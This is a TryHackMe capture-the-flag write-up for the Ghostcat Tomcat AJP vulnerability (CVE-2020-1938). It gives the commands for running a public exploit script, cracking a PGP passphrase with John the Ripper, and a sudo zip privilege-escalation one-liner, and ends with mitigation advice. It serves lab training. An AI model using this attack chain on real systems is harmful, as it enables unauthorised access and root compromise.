{THM}Ghost Cat
CVE-2020-1938
Last updated
CVE-2020-1938
Last updated
Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.
Using nmap scanning to see any open port.
Result of scanning show port 22 ,8009 and 8080 is open. We try to see the web but nothing interesting there.
Since we notice web server using apache tomcat 9.0.30. Let search it vulnerability
From this, we can use 2 type of exploit. In this machine, I use 48143.
python2 48143.py THM_machine -p <port>
Look like we got some credential username : pass. Let login via ssh
Step 2 - Gaining Access
ssh username@THM_machine
Yes we in, let see what file in this.
ls -la
We got some credential in pgp and tryhackme.asc .
import the ASCII armour as a key: gpg --import tryhackme.asc then trying to decrypt the pgp: gpg --decrypt credential.pgp (But this also asks for passphrase)
We donβt know the passphrase. Let do some bruteforce. Downloading ascii in our machine and convert it.
scp skyfuck@THM_machine:tryhackme.asc /<ourlocation>
gpg2john <ourlocation> > <newname>
After that, let crack using john
john --format=gpg --wordlist=<pathlocation> <newname>
And we got the passphrase. Let go back and enter phrase.
Now we got another credential. Username:password.
Let change user to new one.
Su <username>
Now we are Merlin, let find our flag,
User flag locate at Merlin.
Now moving to privilege's escalation, I use my favorite command.
Sudo -l
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
We got JACKPOT !!.
Let exploit this (GTFObin)
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
We now root.
Let find root flag.
Root flag locate at root
User strongly encouraged to upgrade to new version of Tomcat to ensure theyβre protected against this vulnerability.
Some other mitigation recommended
Not active using AJP connector, put comment from /conf/server.xml
Active using AJP connector and cannot update to new version, need to put requiredSecret attribute which is akin to a password and must have strong and unique one.
CVE-2020-1938 Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability
This CVE was found in Apache JServ Protocol (AJP). AJP is binary protocol designed to handle request sent to web server destined for an application server to improve performance.
In instances where the vulnerable server allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code within a variety of file types and trigger this vulnerability to gain remote code execution (RCE).